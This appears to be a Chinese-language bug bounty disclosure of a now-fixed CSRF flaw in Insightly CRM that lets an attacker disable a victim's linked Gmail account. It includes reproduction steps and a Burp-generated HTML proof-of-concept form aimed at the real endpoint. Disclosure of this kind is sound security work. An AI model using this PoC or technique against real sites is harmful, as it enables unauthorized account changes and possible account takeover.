CSRF漏洞允许禁用用户推荐功能的Gmail联系人链接

漏洞概要

当用户通过https://crm.na1.insightly.com/users/referrals添加推荐到其账户时，会获得关联账户的ID。在"CONNECTED APPLICATION SETTINGS"中禁用关联账户时，端点https://crm.na1.insightly.com/users/usersettings会发送包含ID的请求至https://crm.na1.insightly.com/Users/GoogleDisable/2023554。

该漏洞端点允许认证用户更改与其账户关联的电子邮件地址并移除（禁用）它，但未能充分验证请求是否由用户有意执行（例如通过检查HTTP头值）。

复现步骤

需要两个账户（账户A和账户B）来确认问题
访问https://crm.na1.insightly.com/users/referrals并为两个账户添加Google推荐
关联账户将获得两个不同的ID
从账户A访问https://crm.na1.insightly.com/users/usersettings尝试禁用关联账户，并使用Burp代理捕获请求
使用禁用请求生成PoC
当账户B打开链接时，漏洞将被利用

概念验证(PoC)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://crm.na1.insightly.com/Users/GoogleDisable/2026462">
      <input type="hidden" name="_pjax" value="#main" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

发送请求时ID会自动更改，因此受害者的关联账户将被禁用。

影响分析

攻击者可利用此漏洞禁用账户关联或通过将账户与攻击者控制的地址关联然后执行密码重置来接管账户。要使攻击成功，目标用户账户必须与未确认的电子邮件地址关联，且目标用户必须在登录时访问攻击者控制的网站。

时间线

2022年8月13日：漏洞报告提交
2023年10月25日：漏洞修复完成
2024年1月4日：奖励发放
2025年8月20日：报告公开披露

漏洞状态

严重程度：中等（4.2）
弱点类型：跨站请求伪造（CSRF）
状态：已修复
CVE ID：无

Insightly CSRF漏洞分析：攻击者可禁用用户Gmail联系人链接

本文详细分析了Insightly平台存在的CSRF漏洞，攻击者可通过构造恶意请求禁用用户的Gmail联系人链接。报告包含完整的漏洞复现步骤、PoC代码及影响分析，展示了如何利用该漏洞进行账户接管攻击。